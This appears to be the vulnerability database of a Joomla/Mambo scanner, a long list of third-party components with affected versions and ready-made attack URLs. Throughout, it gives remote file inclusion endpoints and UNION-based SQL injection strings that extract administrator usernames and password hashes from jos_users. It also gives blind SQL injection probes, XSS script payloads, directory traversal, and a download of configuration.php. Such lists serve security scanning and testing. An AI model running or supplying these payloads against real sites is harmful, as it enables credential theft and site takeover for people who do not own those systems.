Aff ected: 1.8.0 <= |/components/com_bsq_sitestats/|1) Input passed via the "HTTP Re ferer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrativ e user's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised befor e being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quot es_gpc" is disabled. 
Component: Madeira RFI Vulnerability Versions Affected: Any|/components/com_mad eira/img.php|/components/com_madeira/img.php?url= Component: Mambo eMail Publisher File Inclusion Vulnerability Versions Affected: 1.2 <= |/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp .php?mosConfig_absolute_path= Component: Extended Registration File Inclusion Vulnerability Versions
Affected: 4.1<= |/components/com_extended_registration/registration_detailed.in c.php|/components/com_extended_registration/registration_detailed.inc.php?mosCon fig_absolute_path= Component: OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_sef/|N/A Component: Multibanners File Inclusion Vulnerability Versions Affected: Any|/co mponents/com_multibanners/extadminmenus.class.php|/components/com_multibanners/e xtadminmenus.class.php?mosConfig_absolute_path= Component: MoSpray File Inclusion Vulnerability Versions Affected: 1.8 R C1 <= |/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts /admin.php?basedir= Component: MosMedia File Inclusion Vulnerability Versions Affected: 1.0.8 <= |/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_ absolute_path= Component: Mos Tree File Inclusion Vulnerability Versions Affected: 1.58 <= |/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.ph p?mosConfig_absolute_path= Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions Affected: Any|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_a bsolute_path= Component: MambelFish RFI Vulnerability Versions Affected: 1.x <= |/components/c om_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolut e_path= Component: LMO File Inclusion Vulnerability Versions Affected: 1.0b2 <= |/compon ents/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path= Component: Link Directory File Inclusion Vulnerability Versions Affec ted: Any|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.li nkdirectory.html.php?mosConfig_absolute_path= Component: Letterman Versions Affected: 1.2.4 <= |/components/mod_letterman/|N/A Component: JIM File Inclusion Vulnerability Versions Affected: 1.0.1 <= |/compo nents/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path= Component: JD-Wiki File 
Inclusion Vulnerability Versions Affected: Any|/componen ts/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absol ute_path= Component: Joomla Visites Remote File Inclusion Vulnerability Versions Affected: 1.1 RC2 <= |/components/com_joomla-visites/|/components/com_joomla-vis ites/core/include/myMailer.class.php?mosConfig_absolute_path= Component: JPad SQL Injection Vulnerability Versions Affected: 1.0<= |/compon ents/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+S ELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+ FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Filiale Versions SQL Injection Vulnerability Affected: 1.0.4 <= |/c omponents/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1 ,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11 +FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Pony Gallery SQL Injection Vulnerability Versions Affected: 1.5 < = |/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func= viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x 1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: Joomla Radio 5 File Inclusion Vulnerability Versions Affecte d: 5.0 <= |/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.jo omlaradiov5.php?mosConfig_live_site= Component: Flash Slide Show Gallery File Inclusion Vulnerability Version s Affected: 1.0 <= |/components/com_slideshow/|/components/com_slideshow/admin.s lideshow1.php?mosConfig_live_site= Component: zOOm Media Gallery File Inclusion Vulnerability Versions Affecte d: 2.5.1 RC4 <= |/components/com_zoom/classes/|/components/com_zoom/classes/data base.php?mosConfig_absolute_path= Component: VirtueMart (Joomla! E-Commerce) Multiple XSS Vulnerabilities
Versions Affected: 1.0.11 <= |/components/com_virtuemart/|/index.php?option=com_ contact&Itemid=1"><script>alert(1)</script> Component: User Home Pages 2 File Inclusion Vulnerability Versions Affected: 1.1.1 <= |/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_ab solute_path= Component: User Home Pages 1 File Inclusion Vulnerability Versions Affecte d: 1.1.1 <= |/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_a bsolute_path= Component: TaskHopper File Inclusion Vulnerability Versions Affecte d: 1.1<= |/components/com_thopper/|/components/com_thopper/inc/contact_type.php? mosConfig_absolute_path= Component: Security Images File Inclusion Vulnerability Versions Affected: 3.0. 5 <= |/components/com_securityimages/|/components/com_securityimages/lang.php?mo sConfig_absolute_path= Component: com_utchat File Inclusion Vulnerability Vulnerability Versions Affect ed: 0.2<= |/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php|/components/c om_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file= Component: SimpleBoard Script Insertion File Inclusion Vulnerability Versions Affected: Any|/components/com_simpleboard/|/components/com_simpleboard/file_upl oad.php?sbp= Component: SMF Bridge File Inclusion Vulnerability Versions Affected: 1.1.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_ path= Component: RWCards SQL Injection Vulnerability Versions Affected: 2.4.4 OpenS EF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&cate gory_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,us ertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x5375706572204164 6d696e6973747261746f72-Component: RS Gallery2 SQL Injection Vulnerability Versions Affected: 1.11. 
3<= |/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&ca tid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertyp e,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: PollXT File Inclusion Vulnerability Versions Affected: 1.22.07<= |/co mponents/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_p ath= Component: People Book File Inclusion Vulnerability Versions Affected: 1.1.5 <= |/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/ param.peplebook.php?mosConfig_absolute_path= Component: Phil-A-Form SQL Injection Vulnerability Versions Affected: 1.2.0.0 <= |/components/com_philaform/|/index.php?option=com_philaform&form_id=-1+UNION+SE LECT+null,null,username,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x 1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Per Forms File Inclusion Vulnerability Versions Affected: v1_beta <= |/components/com_performs/|/components/com_performs/performs.php?mosConfig_absol ute_path= Component: Webmaster Tips Portfolio File Inclusion Vulnerability Versions A ffected: 1.0 <= |/components/com_wmtportfolio/|/administrator/components/com_wmt portfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Component: WmT Advanced Flash Gallery File Inclusion Vulnerability Versions Affected: 1.0 <= |/components/com_wmtgallery/|/components/com_wmtgallery/admin. wmtgallery.php?mosConfig_live_site= Component: Flash Panoramic View File Inclusion Vulnerability Versions Affe cted: 1.0 <= |/components/com_panoramic/|/components/com_panoramic/admin.panoram ic.php?mosConfig_live_site= Component: MamboXChange VideoDB File Inclusion Vulnerability Versions Affecte
d: 0.3en <= |/components/com_videodb/core/videodb.class.xml.php|/components/com_ videodb/core/videodb.class.xml.php?mosConfig_absolute_path= Component: HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions Affected: 1.5 <= |/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc .php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfi g_absolute_path= Component: Calendar Versions Affected: 1.5.7 <= |/components/com_calendar/|N/A Component: NFN Address Book Versions Affected: 0.4 <= |/components/com_nfn_addre ssbook/|N/A Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/components/com_x -shop/|/components/com_x-shop/admin.x-shop?mosConfig_absolute_path= Component: Tour de France Pool Versions Affected: 1.0.1 <= |/components/com_tour _toto/|N/A Component: SWmenu File Inclusion Vulnerability Versions Affected: 4.0 <= |/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageMana ger/Classes/ImageManager.php?mosConfig_absolute_path= Component: Nice Talk SQL Injection Vulnerability Versions Affected: 0.9. 3 <= |/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+S ELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertyp e,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x537570657220 41646d696e6973747261746f72-Component: BibTeX Blind SQL Injection Vulnerability Versions Affected: 1.3 <= |/ components/com_jombib/|N/A Component: RSfiles Remote File Download Vulnerability Versions Affected: 1.0.2 < = |/components/com_rsfiles/|/index.php?option=com_rsfiles&task=files.download&pa th=...index.php Component: J! 
Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/componen ts/com_jreactions/|/components/com_jreactions/langset.php?comPath= Component: mosListMessenger Versions Affected: 2.1.0 <= |/components/com_lm/|N/A Component: Webring File Inclusion Vulnerability Versions Affected: 1.0<= | /components/com_webring/|/components/com_webring/admin.webring.docs.php?componen t_dir= Component: Joomla! 12Pictures File Inclusion Vulnerability Versions Affecte d: 1.0<= |/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.p hp?mosConfig_live_site= Component: FlashFun SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_flashfun/|/index.php?option=com_flash&act=view&Itemid=37&id=-13+union +select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: NeoRecruit SQL Injection Vulnerability Versions effected: 1.4. 0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=of fer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1, concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222, 333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x537570 65722041646d696e6973747261746f72-Component: MosReporter File Inclusion Vulnerability Versions effected: 0.9. 3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_ reporter/processor/reporter.sql.php?mosConfig_absolute_path= Component: Joomla Flash Fun! 
File Inclusion Vulnerability Versions effec ted: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfu n/admin.joomlaflashfun.php?mosConfig_live_site= Component: mosDirectory SQL Injection Vulnerability Versions effected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewc at&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype ,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: PU Arcade SQL Injection Vulnerability Versions effected: 2.1 .3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemi d=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: RSGallery SQL Injection Vulnerability Versions effected: 2.0 b
eta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page= inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3 a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: JUser File Inclusion Vulnerability Versions effected: 1.0.14 a nd older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosCon fig_absolute_path= Component: Carousel Flash Image Gallery File Inclusion Vulnerability Versi ons effected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery /admin.jjgallery.php?mosConfig_absolute_path= Component: Color Lab File Inclusion Vulnerability Versions effected: 1.0 an d older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfi g_live_site= Component: Joomla Flash Uploader File Inclusion Vulnerability Versions effe cted: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joo mla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= Component: JContentSubscription File Inclusion Vulnerability Versions effec ted: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?m osConfig_absolute_path= Component: Mp3 Allopass File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-er ror.php?mosConfig_live_site= Component: (xsstream-dm) SQL Injection Vulnerability Versions Affected: N/A|/com ponents/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/** /union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 /**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: (biblestudy) SQL Injection Vulnerability Version Affected: N/A|/compo nents/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UN ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username, 
0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: com_fq SQL Injection Vulnerability Versions effected: N/A|/component s/com_fq/|/index.php?option=com_fq&Itemid=999&listid=999/**/union/**/select/**/0 ,concat (username,0x3a,password)/**/from/**/jos_users+where+usertype=0x537570657 22041646d696e6973747261746f72/* Component: com_football (teamID) SQL Injection Vulnerability Versions effected: N/A|/components/com_football/|/index.php?option=com_football&task=viewteam&team ID=-1+union+select+null,null,3,4,5,6,concat (username,0x3a,password),8+from+jos_ users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: jabode SQL injection Vulnerability Version Affected: N/A|/components/ com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELEC T+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: netinvoice SQL injection Vulnerability Version Affected: N/A|/compone nts/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&ci d=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: beamospetition SQL injection Vulnerability variant 1 Version Affected : N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,userty pe,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e697 3747261746f72-Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/comp onents/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&i 
d=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72--
Component: com_webhosting Blind SQL Injection Vulnerability Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+1=1 ::/index.php?option=com_webhosting&catid=1+and+1=2 Component: com_datsogallery Blind SQL Injection Vulnerability Version Affected : 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'), (1,if(ascii(substring((select password from #__users where username='admin'),0,1 ))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/2 0080404 Firefox/2.0.0.14'),(select link from #__menu)))/* Component: com_artist SQL injection Vulnerability Version Affected: N/A|/compon ents/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,con cat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_user s+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_mycontent Blind SQL Injection Vulnerability Version Affected: N/A |/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=1+and+1 =1::/index.php?option=com_mycontent&task=view&id=1+and+1=2 Component: Joo!BB Blind SQL Injection Vulnerability Version Affected: 0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+ 1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2 Component: acctexp Blind SQL Injection Vulnerability Version Affected: <= 0.1 2|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=1+ and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2 Component: joomradio SQL Injection Vulnerability Version Affected: <= 1.0 |/com ponents/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNI ON+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1, 1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_equotes SQL injection Vulnerability Version Affected: 0.95 <= 
|/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SEL ECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_idoblog SQL Injection Vulnerability Version Affected: b24<= |/com ponents/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1 =1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e 6973747261746f72-Component: JooBlog Blind SQL Injection Vulnerability Version Affected: 0.1.1<= |/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+ 1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2 Component: jotloader Blind SQL Injection Vulnerability Version Affected: 1.2.1. a<= |/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+1=1::/ index.php?option=com_jotloader&cid=1+and+1=2 Component: EasyBook SQL Injection Vulnerability Version Affected: 1.1<= |/compon ents/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid =-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757 065722041646d696e6973747261746f72-Component: joomladate SQL injection Vulnerability Version Affected: N/A|/comp onents/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9 999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password ,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065 722041646d696e6973747261746f72-Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/component s/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1, 2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11, 
12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72Component: n-forms Blind SQL Injection Vulnerability Version Affected: 1.01 <= |/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+1=1::/inde x.php?option=com_n-forms&form_id=1+and+1=2 Component: yvcomment Blind SQL Injection Vulnerability Version Affected: 1.16 <= |/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&Arti
cleID=1+and+1=1::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1= 2 Component: News Portal Blind SQL Injection Vulnerability Version Affected: 1.0 <= |/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and +1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2 Component: expshop SQL injection Vulnerability Version Affected: N/A|/componen ts/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+S ELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Xe webtv Blind SQL Injection Vulnerability Version Affected: N/A|/c omponents/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+ and+1=1::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=2 Component: com_versioning (id) SQL Injection Vulnerability Version Affected: 1.0.2<= |/components/com_versioning /|/index.php?option=com_versioning&task=ed it&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 F ROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: mygallery SQL Injection Vulnerability Version Affected: N/A|/compon ents/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNI ON+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6, 7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472617 46f72-Component: Brightcode Weblinks SQL Injection Vulnerability Version Affected: N/ A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58 &catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 ,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72 -Component: QuickTime VR SQL Injection Vulnerability Version Affected: 1.0 <= 
|/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+ UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: is_com Multiple SQL Injection Vulnerability Version Affected: 1.0.1 <= |/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+S ELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8, 9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726174 6f72-Component: altas multiple SQL Injection Vulnerability Version Affected: 1.0 <= |/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select% 201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: com_dbquery RFI Vulnerability Version Affected: 1.4.1.1 <= |/comp onents/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?m osConfig_absolute_path= Component: ionFiles com_ionfiles Arbitrary File Download Vulnerability Versi on Affected: 4.4.2 <= |/components/com_ionfiles/|/components/com_ionfiles/ download.php?file=../../configuration.php&download=1 Component: DT SQL Injection Vulnerability Version Affected: N/A|/components/ com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usert ype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138 Component: com_ezstore Blind SQL Injection Vulnerability Version Affected: N /A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&i d=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2 Component: com_na_qforms (QF_msg) Cross Site Scripting (XSS) Vulnerability Ver sion Affected: N/A|/components/com_na_qforms/|/index.php?option=com_na_qforms&QF _url=error&QF_msg=%3E%3Cscript%3Ealert(1)%3C/script%3E Component: Joomla Imagebrowser Directory 
Tranversal Vulnerability Version Affe cted: 0.1.5 RC2<= |/components/remository/|/index.php?option=com_imagebrowser &folder=../../../../_non_ Component: com_hotspots SQL Injection Vulnerability Version Affected: N/A|/co
mponents/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1 =2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x5 3757065722041646d696e6973747261746f72-Component: com_joomtracker SQL Injection Vulnerability Version Affected: 1.0 .1<= |/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordet ails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,conca t(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e69737 47261746f72 Component: Ignite SQL Injection Vulnerability Version Affected: 0.8.3<= |/co mponents/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&galler y=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 Component: Mad4Joomla Mailforms SQL Injection Vulnerability Version Affected: N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+s elect+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype= 0x53757065722041646d696e6973747261746f72-Component: Ownbiblio (com_ownbiblio) SQL Injection Vulnerability Version Affect ed: 1.5.3<= |/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=ca talogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: Daily Message (com_dailymessage) SQL Injection Vulnerability Version Affected: 1.0.3<= |/components/com_dailymessage/|/index.php?option=com_dailym essage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),pas sword)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e697374726174 6f72-Component: com_ds-syndicate SQL Injection Vulnerability Version Affected: N/A |/components/com_ds-syndicate/|Request 
/index.php?option=ds-syndicate&version=1& feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3 ,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x537 57065722041646d696e6973747261746f72-- and If you get some file to download like feed or xml, download that file and open with some text editor to see informatio ns like username and password Component: com_thyme SQL Injection Vulnerability Version Affected: 1.0<= |/c omponents/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y =2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3 a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+j os_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Archaic Binary Gallery Directory Traversal Vulnerability Version Affe cted: 1.0<= |/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid =37&gallery=_NOT_EXIST Component: Kbase (com_kbase) SQL Injection Vulnerability Version Affected: 1.2<= |/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+se lect+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Ver sion Affected: 1.0<= |/administrator/components/com_treeg/|/administrator/compon ents/com_treeg/admin.treeg.php?mosConfig_live_site= Component: VirtueMart Google Base Component (com_googlebase) Remote File Inclusi on Vulnerability Version Affected: 1.1<= |/components/com_googlebase/|/component s/com_googlebase/admin.googlebase.php?mosConfig_absolute_path= Component: com_ongumatimesheet20 Beta Remote File Inclusion Vulnerability Ver sion Affected: 4<= |/components/com_ongumatimesheet20/|/components/com_ongumat imesheet20/lib/onguma.class.php?mosConfig_absolute_path= Component: ProDesk (com_pro_desk) Local File Inclusion 
Vulnerability Version Affected: 1.2<= |/components/com_pro_desk/|/index.php?option=com_pro_desk&in clude_file= Component: Clickheat - Heatmap stats for Joomla! Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.1<= |/components/com_clickheat/|/com
ponents/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <= |/components/com_dadamail/|/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Recly!Competitions Component Multiple Remote File Inclusion Vulnerability Version Affected: 1.0.0 <= |/components/com_competitions/|/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=
